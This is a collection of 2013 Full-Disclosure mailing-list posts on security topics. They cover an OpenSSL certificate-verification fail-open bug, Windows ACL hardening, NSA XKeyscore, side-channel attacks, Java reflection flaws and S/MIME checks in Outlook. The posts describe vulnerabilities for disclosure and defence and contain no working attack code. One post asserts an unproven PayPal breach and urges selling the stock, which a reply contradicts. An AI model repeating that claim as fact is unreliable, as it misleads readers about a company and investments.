iOS: List of available trusted root certificates, http://support.apple.com/kb/HT5012. Lots of goodies in that list of 200+, including use of MD2 and MD5. The usual suspects are also present, including CNNIC (or if you're from China, the U.S. bloat). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] possible backdoor in OpenSSL X509 verification
Can someone take a look on this shady X.509 certificate verification code (fails open in case of out-of-memory error): http://rt.openssl.org/Ticket/Display.html?id=2924 Well, I know Dr. Henson, Steve Marquess, Andy Poyakov, Tim Hudson, and few others (to varying degrees). I can tell you its not an intentional back door along the lines of http://cryptome.org/2012/01/0032.htm. OpenSSL has one full time developer dedicated to maintaining the library. Often times, he's busy consulting for the Foundation so he does not have the opportunities to maintain the code like folks want. http://rt.openssl.org/Ticket/Display.html?id=2924 Keep in mind that OpenSSL recently migrated bug trackers (from an old RT to a new RT), so that bug may be older than November, 2012. And it might be fixed in the sources, too. The best I can tell, no one really maintains that list (when's the last time you saw something acknowledged?). Its more like a scratch pad. Noone from OpenSSL team has commented whether this is exploitable or should it be rewritten in safer manner. OpenSSL is a open project, and it lack a solid engineering process. What you are seeing is the effects of an ad hoc process, donated developer time, and open source development. This is because for loop later does not require to find even a single issuer certificate from trust store and will happily break loop if last certificate is actually self signed. Its just another bug that slipped through the cracks. No one is trying to hide a back door. I've tried to get the Foundation to address these problems with policy (everything must have positive and negative test cases). No one really cared. Then I tried to get them to address it by accepting my negative test cases (which broke things in practice). No one really cared. Until the project improves their engineering process, things won't change. If you can put together a test case showing any certificate is accepted (and subject to tampering or MitM), then that's a security defect. You should probably get a CVE for it so it can be tracked. Jeff On Fri, Sep 6, 2013 at 10:28 AM, Arnis ar...@ut.ee wrote: Can someone take a look on this shady X.509 certificate verification code (fails open in case of out-of-memory error): http://rt.openssl.org/Ticket/Display.html?id=2924 Certificate chain verification in crypto/x509/x509_vfy.c X509_verify_cert() fails badly and may allow verification bypass if check_issued() on line 259 returns false negative on check whether the last certificate in chain is self signed. For example, check_issued() may return false negative in case of memory allocation failure (although could not find how to force that). 253 /* Examine last certificate in chain and see if it 254 * is self signed. 255 */ 256 257 i=sk_X509_num(ctx-chain); 258 x=sk_X509_value(ctx-chain,i-1); 259 if (ctx-check_issued(ctx, x, x)) This is because for loop later does not require to find even a single issuer certificate from trust store and will happily break loop if last certificate is actually self signed. Noone from OpenSSL team has commented whether this is exploitable or should it be rewritten in safer manner. P.S. Subject field inspired by latest NSA stories ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defense in depth -- the Microsoft way (part 8): execute everywhere!
Hi Stefan, ... administrative rights for every user account Hmmm... XP/x64 appears to have a bug such that the second user also needs to be admin (perhaps XP/x86, too). XP does not recognize the first account as admin, so the second account cannot be limited (at least on my test box). Vista and above make the first user admin, but others users default to standard. Jeff On Sat, Aug 24, 2013 at 5:32 PM, Stefan Kanthak stefan.kant...@nexgo.de wrote: Hi, since it's start about 20 years ago Windows NT supports (fine grained) ACLs, including the permission execute file. In their very finite wisdom Microsoft but decided back then to have this permission set on EVERY file a user creates (and assumes it is set on local and remote file systems which dont support ACLs). The result: on Windows, malware can run everywhere (and since CWD alias . is in the path, can be started everywhere)! These fundamental errors, combined with two other fundamental errors (NO ACLs on %SystemRoot% and %ProgramFiles% to prevent write access for non-administrative user accounts, and administrative rights for every user account) turned Windows NT into the same unsafe, insecure and vulnerable system its predecessors MS-DOS and Windows 3.x were and enabled miscreants to abuse internet-connected Windows systems to distribute SPAM, launch DDoS attacks, spread malware, etc. For a company that puts compatibility above all other criteria this decision might have looked reasonable ... BUT: it was NOT! Windows NT introduced the Win32-API, which is/was INCOMPATIBLE to the existing DOS- and Win16-API. To run existing applications written for the old APIs Windows NT introduced NTVDM (the Virtual DOS Machine) and WoW (the Windows on Windows subsystem); only these Windows NT components had to be made compatible (and unsafe enough to run old applications). There was ABSOLUTELY no need to sacrifice the safety and security of Windows NT and the Win32-API for the sake of compatibility: the Win32-API was new, no existing applications had to be supported! Then sloppy developers started to build their applications for the Win32-API of this unsafe/insecure environment ... and expected their unsuspecting victims^Wusers to have write access to %SystemRoot% and/or %ProgramFiles% to write their *.INI files, for example, or to run their crapware with administrative or power-user rights. JFTR: since many years Microsoft makes many (almost futile) attempts to mitigate the effect of their wrong design decision(s), for example: * http://support.microsoft.com/kb/269049 alias http://technet.microsoft.com/security/bulletin/ms00-052 * http://support.microsoft.com/kb/306850 * http://support.microsoft.com/kb/905890 * http://support.microsoft.com/kb/953818 alias http://technet.microsoft.com/security/advisory/953818 * http://support.microsoft.com/kb/959426 alias http://technet.microsoft.com/security/bulletin/ms09-015 * http://support.microsoft.com/kb/2264107 * http://support.microsoft.com/kb/2269637 alias http://technet.microsoft.com/security/advisory/2269637 PLUS the 28(!) security bulletins listed there but NEVER tackled the source of the problem! Instead they introduced things like the security theatre UAC: with Windows 8 the user account(s) created during setup still have administrative rights. And Windows 7 introduced the silent elevation for about 70 of Microsoft own programs... stay tuned Stefan Kanthak PS: if you want to mitigate the wrong design decision that every file is executable: add and propagate an inheritable-only deny ACE with execute file permission for the user group WORLD\Everyone alias S-1-1-0, (D;OIIO;WP;;;WD) in SDDL notation, at least for %USERPROFILE% and %ALLUSERSPROFILE% alias %ProgramData%. On Windows NT 6.x, consider to add another deny ACE which prevents the directories/objects owner from changing/removing that permission: (D;;WDAC;;;OW) in SDDL notation. Since this mitigation will stop Administrators and LocalSystem to run files in their user profiles (to be precise: in %TEMP% alias %USERPROFILE%\Local Settings\Application Data\TEMP resp. %USERPROFILE%\AppData\TEMP where self-extracting installers will typically unpack and execute their payload) you'll have to remove the user environment variables TEMP and TMP of these user accounts (setting the system environment variables TEMP and TMP which point to %SystemRoot%\TEMP into effect). See the script http://home.arcor.de/skanthak/download/~EXECUTE.INF for a POC (targetting Windows NT 5.x). It sets the deny ACE also on subordinate directories which are exempt from ACL inheritance, as well as some of the user-writable subdirectories of %SystemRoot% which dont host executable files. WARNING: unfortunately the (only) Microsoft utility which allows to add the specific ACEs, ICACLS.EXE, used in
Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)
On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn j...@thejh.net wrote: On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote: Hello dear companions, Two days ago one of my tor exit nodes experienced something I'm now calling limestonenetworks DDoS on polipo ( $WAN_IP:8123 ), since all DDoS? So you mean your systems were impacted by that? He may be running an exit node for the benefit of others on a low bandwidth connection. Forgive me if you were joking with an old friend, or I missed something. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)
On Fri, Aug 16, 2013 at 4:30 PM, Jann Horn j...@thejh.net wrote: On Fri, Aug 16, 2013 at 01:37:54PM -0400, Jeffrey Walton wrote: On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn j...@thejh.net wrote: On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote: Hello dear companions, Two days ago one of my tor exit nodes experienced something I'm now calling limestonenetworks DDoS on polipo ( $WAN_IP:8123 ), since all DDoS? So you mean your systems were impacted by that? He may be running an exit node for the benefit of others on a low bandwidth connection. Forgive me if you were joking with an old friend, or I missed something. Let's check how massive that attack is. I didn't claim it was massive. I simply said he may be bandwidth limited. What other traffic is on that line? Or do all Tor folks purchase a second internet connection for their Tor services? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CALEA Re: XKeyscore
On Mon, Aug 12, 2013 at 9:07 AM, Pedro Luis Karrasquillo peter_toy...@hotmail.com wrote: ... On slide 7 they show a red dot over Venezuela. You think Chavez let the spooks tap into the fiber there too? Where does the fiber tap connect to? Oh wait, there is a red dot over Moscow too... One of my former college instructors (Dr. Henry Katz) headed this program while he was at the NSA: https://en.wikipedia.org/wiki/Operation_Ivy_Bells. Dr. Katz could talk about it because it was eventually reported in the press after all the dust settled. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: [cryptography] Paypal phish using EV certificate
It looks like Paypal has suffered a break-in and phishing attempts are being made on its users. Time to sell you stock (or buy it short) for the immediate future. -- Forwarded message -- From: Jeffrey Walton noloa...@gmail.com Date: Tue, Aug 13, 2013 at 5:25 AM Subject: Re: [cryptography] Paypal phish using EV certificate To: Peter Gutmann pgut...@cs.auckland.ac.nz Cc: cryptogra...@randombit.net On Tue, Aug 13, 2013 at 5:10 AM, Peter Gutmann pgut...@cs.auckland.ac.nz wrote: I recently got a another of the standard phishing emails for Paypal, directing me to https://email-edg.paypal.com, which redirects to https://view.paypal-communication.com, which has a PayPal EV certificate from Verisign. According to this post http://www.onelogin.com/a-paypal-phishing-attack/ it may or may not be a phishing attack (no-one's really sure), and this post http://www.linuxevolution.net/?p=12 says it is a phishing attack and the site will be shut down by Paypal... back in May 2011. Can anyone explain this? It's either a really clever phish (or the CAs are following their historically lax levels of checking), or Paypal has joined the ranks of US banks in training their users to become phishing victims. If that's true, I think the more interesting fact is: it appears email-edg.paypal.com is controlled by the attacker. Why else would Paypal redirect from a host in their domain to a host not in their domain controlled by the adversary? (Its a bit different than standard phishing training where both hosts/domains are controlled by Paypal). Has Paypal fess'ed up to any break-ins or breaches? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: [cryptography] Paypal phish using EV certificate
On Tue, Aug 13, 2013 at 7:22 AM, Julius Kivimäki julius.kivim...@gmail.com wrote: All of the domains involved just happen to be registered on markmonitor by PayPal. Really doubt this has anything to do with phishing. According to http://www.linuxevolution.net/?p=12 (referenced in the original email), Paypal stated the site paypal-communication.com was a phishing site. 2013/8/13 Jeffrey Walton noloa...@gmail.com It looks like Paypal has suffered a break-in and phishing attempts are being made on its users. Time to sell you stock (or buy it short) for the immediate future. -- Forwarded message -- From: Jeffrey Walton noloa...@gmail.com Date: Tue, Aug 13, 2013 at 5:25 AM Subject: Re: [cryptography] Paypal phish using EV certificate To: Peter Gutmann pgut...@cs.auckland.ac.nz Cc: cryptogra...@randombit.net On Tue, Aug 13, 2013 at 5:10 AM, Peter Gutmann pgut...@cs.auckland.ac.nz wrote: I recently got a another of the standard phishing emails for Paypal, directing me to https://email-edg.paypal.com, which redirects to https://view.paypal-communication.com, which has a PayPal EV certificate from Verisign. According to this post http://www.onelogin.com/a-paypal-phishing-attack/ it may or may not be a phishing attack (no-one's really sure), and this post http://www.linuxevolution.net/?p=12 says it is a phishing attack and the site will be shut down by Paypal... back in May 2011. Can anyone explain this? It's either a really clever phish (or the CAs are following their historically lax levels of checking), or Paypal has joined the ranks of US banks in training their users to become phishing victims. If that's true, I think the more interesting fact is: it appears email-edg.paypal.com is controlled by the attacker. Why else would Paypal redirect from a host in their domain to a host not in their domain controlled by the adversary? (Its a bit different than standard phishing training where both hosts/domains are controlled by Paypal). Has Paypal fess'ed up to any break-ins or breaches? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
On Mon, Aug 12, 2013 at 1:28 PM, Coderaptor coderap...@gmail.com wrote: I have been a silent spectator to this drama, and could not resist adding a few thoughts of my own: 1. All software, especially webservers, should ship with secure defaults. Period. It is a fundamental mistake to assume all admins who roll out web apps and maintain servers RTFM before rolling out. The key idea here is time to market, and there is huge amount of data to prove this. +1. All software should be shipped secure out of the box. Its amazing so many folks keep making the same mistakes from the 1980s and 1990s. ... Huge amount of software today is turd polishing, open source no exception (though it is supposed to have better track record). The blame lies squarely on everyone. The more eyes the better theory is hogwash. I cringe when I hear anyone discussing the security of crowd sourcing. There's two problems with their arguments: first is Cognitive Biases, and second is the Bystander Effect. The biases are being demonstrated by NB and RH, and its results are typical (no offense NB and RH). The Bystander Effect ensures that the more people see a bug, the less likely they are going to do anything about it because they believe someone else has already done something. They are well known problems in Security Engineering. See Peter Gutmann's Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf) or Ross Anderson's Security Engineering (http://www.cl.cam.ac.uk/~rja14/book.html). Jeff On Aug 11, 2013, at 3:30 PM, Reindl Harald h.rei...@thelounge.net wrote: Am 11.08.2013 23:56, schrieb Stefan Kanthak: Reindl Harald h.rei...@thelounge.net wrote: again: symlinks are to not poision always and everywhere they become where untrusted customer code is running blame the admin which doe snot know his job and not the language offering a lot of functions where some can be misused Again: symlinks are well-known as attack vector for years! and that's why any admin which is not clueless disables the symlink function - but there exists code which *is* secure, runs in a crontrolled environment and make use of it for good reasons It's not the user/administrator who develops or ships insecure code! but it's the administrator which has the wrong job if create symlinks is possible from any random script running on his servers anyways, i am done with this thread the topic is *not* Apache suEXEC privilege elevation it is admins not secure their servers - period ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
On Sat, Aug 10, 2013 at 6:10 AM, Gichuki John Chuksjonia chuksjo...@gmail.com wrote: One thing u gotta remember most of the Admins who handle webservers in a network are also developers since most of the organizations will always need to cut on expenses, and as we know, most of the developers will just look into finishing work and making it work. So if something doesn't run due to httpd.conf, you will find these guys loosening server security, therefore opening holes to the infrastructure. Cognitive Bias and Dissonance are well known problems in security engineering. NB's comments are a testament to the disconnect between the creators of the system and the users of the system. (No offense to NB). See, for example, Peter Gutmann's Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf) or Ross Anderson's Security Engineering (http://www.cl.cam.ac.uk/~rja14/book.html). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XKeyscore sees 'nearly EVERYTHING you do online
On Thu, Aug 1, 2013 at 2:56 PM, Gary Baribault g...@baribault.net wrote: Optically tapping ALL of the submarine cable going into and out of the U.S. would still not give them ALL of the claimed data. They have to be tapping all of the major traffic exchange sites in the U.S. to get this kind of data. The US does that. In 'The Spy Factory' (http://video.pbs.org/video/1051968443/) from 2009, the producers interviewed the ATT technicians who worked at the COs where the taps occur. They also interviewed a US Army analyst who listen in on the calls. Since the video, there's been a number of documents circulating about the practice. See, for example, http://en.wikipedia.org/wiki/Stellar_Wind_(code_name). Jeff On 08/01/2013 11:31 AM, XF wrote: Did you understood how they collect data ? This is not clear for me...ISP backdoor ? Optical tap on sub marine wire ? Le 1 août 2013 à 16:26, Georgi Guninski gunin...@guninski.com a écrit : it will be interesting to me what will remain of the nsa when the chinese comrades stop giving fresh money to the usa. Detroit news are not very pink. On Thu, Aug 01, 2013 at 11:20:27PM +1200, Hugh Davenport wrote: meanwhile, in new zealand, prime minister suggests that we aren't the slaves for nsa... On 2013-08-01 19:23, Georgi Guninski wrote: XKeyscore sees 'nearly EVERYTHING you do online http://www.theregister.co.uk/2013/07/31/prism_put_in_the_shade_by_leak_about_even_more_powerful_snoop_tool/ New NSA tool exposed: XKeyscore sees 'nearly EVERYTHING you do online' From the presentation: * Show me all the exploitable machines in country X * How do I find a cell of terrorust that has no connection to known strong-selectors **Anomalous events ***Someone who is using encryption ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XKeyscore sees 'nearly EVERYTHING you do online
On Thu, Aug 1, 2013 at 6:36 PM, Gary Baribault g...@baribault.net wrote: I think the NSA could twist arms in the U.S. and I think that they could have a deal with the U.K. and maybe Canada, what I have HUGE doubts about is how they transport all of that data back to their data centres, unless they have a massive quantity of dark (private) fibre that no one knows about. It does not appear to be a centralized architecture. According to slides, they have servers situated all around the world. Per slide 5, there are 500+ servers. According to slide 7, there are 700+ servers at 150 sites throughout the world. The reason for the difference in numbers of servers is not readily apparent. When an analysts performs a query, the servers return the appropriate data. Jeff On 08/01/2013 04:46 PM, XF wrote: So you think this is real ? All Tiers 1 would be partner with NSA ? Even in Europ ? This sound crazy Le 1 août 2013 à 22:19, Gary Baribault g...@baribault.net a écrit : Don't forget that they also have to back haul that data to their data centres !! They would have to have secret agreements with all of the Tier 1 carriers. Sure sounds far fetched! Gary B On 08/01/2013 03:51 PM, XF wrote: Right. But where are their tap ? In Internet Exchange Point ? In AS ? And how can they do that ? Hello, I'm NSA, can I get a TAP on your network :-) This would say that ISP agree and the amount of data to transfer would be so vast . How can they transfer all this amount of data into their system ?? Le 1 août 2013 à 20:56, Gary Baribault g...@baribault.net a écrit : Optically tapping ALL of the submarine cable going into and out of the U.S. would still not give them ALL of the claimed data. They have to be tapping all of the major traffic exchange sites in the U.S. to get this kind of data. Gary B On 08/01/2013 11:31 AM, XF wrote: Did you understood how they collect data ? This is not clear for me...ISP backdoor ? Optical tap on sub marine wire ? Le 1 août 2013 à 16:26, Georgi Guninski gunin...@guninski.com a écrit : it will be interesting to me what will remain of the nsa when the chinese comrades stop giving fresh money to the usa. Detroit news are not very pink. On Thu, Aug 01, 2013 at 11:20:27PM +1200, Hugh Davenport wrote: meanwhile, in new zealand, prime minister suggests that we aren't the slaves for nsa... On 2013-08-01 19:23, Georgi Guninski wrote: XKeyscore sees 'nearly EVERYTHING you do online http://www.theregister.co.uk/2013/07/31/prism_put_in_the_shade_by_leak_about_even_more_powerful_snoop_tool/ New NSA tool exposed: XKeyscore sees 'nearly EVERYTHING you do online' From the presentation: * Show me all the exploitable machines in country X * How do I find a cell of terrorust that has no connection to known strong-selectors **Anomalous events ***Someone who is using encryption ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack
On Fri, Jul 26, 2013 at 3:37 PM, valdis.kletni...@vt.edu wrote: On Fri, 26 Jul 2013 07:31:09 +0100, Hurgel Bumpf said: Just found this online.. might be of interest Direct PDF: http://eprint.iacr.org/2013/448.pdf From the fine PDF: The Flush+Reload attack is a variant of the Prime+Probe attack that relies on sharing pages between the spy and the victim programs. With shared pages, the spy program can ensure that a specic memory line is evicted from the whole cache hierarchy. The spy uses this to monitor access to the memory line. The fact you need to get gnupg to share the pages in question with you does mean that this isn't, by itself, a knockout blow. Still quite the interesting attack. And attacks always improve. Maybe somebody will find a way to do better... Dr. Bernstein puts a lot of effort into defending against timing attacks and other side channels in his NaCl library. I'm not aware of any other libraries which go to the same depths. On the downside, NaCl is not easy to work with (for example, change compilers or cross-compile for iOS or Android); its not really portable (lots of C language violations); nor is it easy to get analysis tools on it. Recently, he presented an OWASP talk that included the subject matter (including lots of other practical crypto failures). * Slides: http://www.secappdev.org/handouts/2012/Dan%20J.%20Bernstein/worst%20practices.pdf * Talk: https://www.owasp.org/download/jmanico/owasp_podcast_95.mp3 * Video: http://secappdev.org/lectures/144 For DNSSEC fans, he beats the hell out of DNSSEC for its amplification attacks and other info leaks. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trustlook Found Hundreds of Malicious Applications in the Google Play Store
On Fri, Jul 26, 2013 at 11:13 AM, bugfree bugf...@gmail.com wrote: Here is the article. http://blog.trustlook.com/news/trustlook-found-hundreds-of-malicious-applications-in-the-google-play-store/ Peter Gutmann has a lot of fun with over-permissioned battery apps in his book Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf). As you've learned, allowing naive users to give invasive apps too many permissions is not perceived as a threat. Its a shame AOSP is still making the same engineering mistakes from the 1980s and 1990s. Users are not going to miraculously wake up tomorrow with additional security-IQ points. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SE-2012-01] New Reflection API affected by a known 10+ years old attack
On Thu, Jul 18, 2013 at 12:50 AM, Security Explorations cont...@security-explorations.com wrote: Hello All, We discovered yet another indication that new Reflection API introduced into Java SE 7 was not a subject to a thorough security review (if any). I'm kind or surpised some of these bugs exist for so long. Allowing them to fester and rot can't be good (I have not been able to come up with a use case where it is desired or preferred). Does anyone know anything about Oracle's engineering process? What is Oracle doing to ensure issues are tracked and remediated in reasonable time? What does the process include for code scanning to catch low hanging fruit? Are they using Find Bugs or Coverity (I checked scan.coverity.com, and I did not see Oracle Java or OpenJDK listed, so I wonder if they are doing it internally). What is the QA process doing to ensure items with negative impact are not allowed to pass? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SE-2012-01] New Reflection API affected by a known 10+ years old attack
On Sat, Jul 20, 2013 at 5:27 PM, Bob iPhone Kim evdo.hs...@gmail.com wrote: Guys... can we keep personal discussions personal??? I'm not sure questioning the engineering process is off-topic in this case (http://lists.grok.org.uk/full-disclosure-charter.html): - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. If it is, then please accept my apologies. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Fri, Jun 21, 2013 at 7:48 AM, Georgi Guninski gunin...@guninski.com wrote: On Thu, Jun 20, 2013 at 03:57:20PM -0700, Kurt Buff wrote: ... i won moderate amount of beer from bets on when will freebsd ditch gcc from base?. fanatics took the bait and get mad at the observation freebsd wouldn't exist in its current form without gcc. since at least recently clang can't compile some stuff g++ can (almost sure gnu extensions). Clang has caused a lot of pain and misery because it claims to be GCC, but it can't digest programs with GCC extensions. https://www.google.com/#q=clang+__GNUC__+bug Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Newbie] How to search in all full-disclosure@lists.grok.org.uk
On Fri, Jun 21, 2013 at 10:38 AM, JOSE DAMICO jd.comm...@gmail.com wrote: Hi, Is there a way to make full search by keyword in all full-disclosure@lists.grok.org.uk archive of messages? In Google: search terms site:seclists.org/fulldisclosure Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Outlook Vulnerability: S/MIMELossof Integrity
On Mon, Jun 17, 2013 at 11:19 AM, ACROS Security Lists li...@acros.si wrote: Valdis, No, that's how to do it *hardline*. There's many in the security industry that will explain to you that it's also doing it *wrong*. Hint - the first time that HR sends out a posting about a 3-day window next week to change your insurance plan without penalty, signs it with something that doesn't match the From:, and the help desk is deluged by phone calls from employees who can't read the mail, the guy who put You shall not pass in place will be starting a job hunt. If there was an industry standard specifying the you-shall-not-pass for all web browsers, it wouldn't be the guy (developer) who put this roadblock in place that would start a job hunt but someone within the company whose job was to avoid the roadblock by making sure the cert that HR is using was okay. That would happen a couple of times, and then not any more, as people have great capacity for learning. ... If I get an encrypted message that was mistakenly not encrypted with my key, it would be very productive to have a Just decrypt anyway button but we obviously don't have that. ... A lot of folks would like to have that button ;) Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Outlook Vulnerability: S/MIMELossof Integrity
On Mon, Jun 17, 2013 at 2:49 PM, Daniël W. Crompton daniel.cromp...@gmail.com wrote: how would that work? AKAIK S/MIME is public key cryptography, how would you decrypt a message which is not encrypted with your public key? Exactly. How does one decrypt when they don't hold the private key. That magic button would come in handy for a lot of folks. Jeff On 17 June 2013 20:17, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Jun 17, 2013 at 11:19 AM, ACROS Security Lists li...@acros.si wrote: Valdis, No, that's how to do it *hardline*. There's many in the security industry that will explain to you that it's also doing it *wrong*. Hint - the first time that HR sends out a posting about a 3-day window next week to change your insurance plan without penalty, signs it with something that doesn't match the From:, and the help desk is deluged by phone calls from employees who can't read the mail, the guy who put You shall not pass in place will be starting a job hunt. If there was an industry standard specifying the you-shall-not-pass for all web browsers, it wouldn't be the guy (developer) who put this roadblock in place that would start a job hunt but someone within the company whose job was to avoid the roadblock by making sure the cert that HR is using was okay. That would happen a couple of times, and then not any more, as people have great capacity for learning. ... If I get an encrypted message that was mistakenly not encrypted with my key, it would be very productive to have a Just decrypt anyway button but we obviously don't have that. ... A lot of folks would like to have that button ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple and Wifi Hotspot Credentials Management Vulnerability
This vulnerability was published to the OWASP Mobile Security list as a research paper by Andreas Kurtz, Daniel Metz and Felix Freiling. See Cracking iOS personal hotspots using a Scrabble crossword game word list, http://lists.owasp.org/pipermail/owasp-mobile-security-project/2013-June/000640.html. It appears Apple Wifi hotspot passwords are generated using a wordlist consisting of 1842 words. The authors built a customer cracker to aide in recovery of the Wifi hotspot passwords. The paper's homepage can be found at https://www1.cs.fau.de/hotspot. The paper does not offer a CWE classification or CVE at this point in time. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple and Wifi Hotspot Credentials Management Vulnerability
On Mon, Jun 17, 2013 at 3:35 PM, Jeffrey Walton noloa...@gmail.com wrote: ... It appears Apple Wifi hotspot passwords are generated using a wordlist consisting of 1842 words. The authors built a customer cracker to aide in recovery of the Wifi hotspot passwords. My bad. The application estimates the time to crack the password used. It does not attempt to recover the password. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Outlook Vulnerability: S/MIME Loss of Integrity
On Mon, Jun 17, 2013 at 9:32 AM, Patrick Dunstan patrick.duns...@gmail.com wrote: Completely agree with your sentiments here, Valdis. The error messages given to everyday users are completely ridiculous in most cases. I feel though with the padlocks and green bars in browsers nowadays, there has at least been some effort made to make security understandable for the average user out there. But you're right in saying so much more is needed/could be done. The browsers are just confusing users. Consider: No encryption (plain HTTP) - good, no indicators Opportunistic encryption (self signed, HTTPS) - bad, red bar Encryption (CA, HTTPS) - good, green bar As Peter Gutmann, puts it, getting a certificate for a website is like getting one from a vending machine (race to the bottom, FTW), so a CA certificate has no more value than a self signed certificate used in opportunistic encryption. Yet users are told opportunistic encryption is bad, and plain text HTTP is good. And CA's keep making money while disavowing all warranties and liability for the certificates they issue. And don't get me started on the security dialogs written by geeks for geeks (or more correctly, INTP's and INTJ's from the Myers-Briggs Type Indicator (MBTI)). What bewilders me in 2013 is that email has been completely left behind. ... Case in point: Google don't even offer support for S/MIME in GMail and it's probably the most widely used online email service available today. +1 (I'd love to give you more). Jeff On Mon, Jun 17, 2013 at 10:23 PM, valdis.kletni...@vt.edu wrote: On Sun, 16 Jun 2013 00:51:10 +0930, Defence in Depth said: Microsoft Outlook (all versions) suffers from an S/MIME loss of integrity issue. Outlook does not warn against a digitally signed MIME message whose X509 EmailAddress attribute does not match the mail's From address. Congrats on the technical side, for spotting this. On the flip side, there are a number of cases where the signer address legitimately does not match the From: address. For instance - if the signer is listed in Sender: instead of From:, if it has passed through a mailing list that rewrites the From: line, or some combinations of resends and forwards. And yes, a lot of this sort of crap is only semi-legit because it's coming from misconfigured servers - but operational reality dictates that you have to deal with the fact that there's a *lot* of (And we'll overlook the additional fun and games available due to the distinction between an RFC821 MAIL FROM: and and RFC822 From: line). I suppose it could be worse - it's been a few years since I last saw a %-hacked address in an e-mail. A few operational notes regarding alerts in user-facing software: 1) A lot of browsers used to display broken padlocks when SSL failed. They don't do this anymore because users *will not* look at that sort of subtle warning. 2) They'll look at a big pop-up that obstructs their view - but only if it happens so rarely that they have to call somebody and ask wtf is this?. If it becomes a oh it does this once every week or two click-through, it's now become worse than useless. As you noted, most browsers will notify the user if the browser detects a CN mismatch. What you gloss over is that browsers *totally suck* at presenting that warning in a way that is both understandable and actionable to a general user. Just yesterday I had Firefox alert on a SLL certificate mismatch, and it gave me the helpful info that the certificate presented was only valid for *.akamai.net. Now, *I* know exactly what happened there, and *you* know, and the guy who pushed some content to Akamai without looking to see if there were https: links pointing at the content will go D'Oh! when he finds out - but if you're Joe Sixpack and don't know if Akamai is a box in your ISP's server room or a box in a server roomin the Ukraine, you got nothing. And if you get enough of these totally annoying pop ups, you'll just learn to click through without thinking. Bottom line: yes, it would be nice if all this sort of stuff was more widely deployed and enforced. But given that we've tried this with dismal results with Windows UAC alerts, firewall alerts, browser alerts, and A/V alerts, there's no real reason to expect that *this* time we'll actually get it right for MUA alerts. Bonus points for the most creative suggestion for how to leverage a *fake* From:/signature mismatch alert into a compromise (a la fake AV alerts that get you to download actual malware). Really - Outlook may do this wrong, but I don't think we as an industry have a frikking clue how to actually do 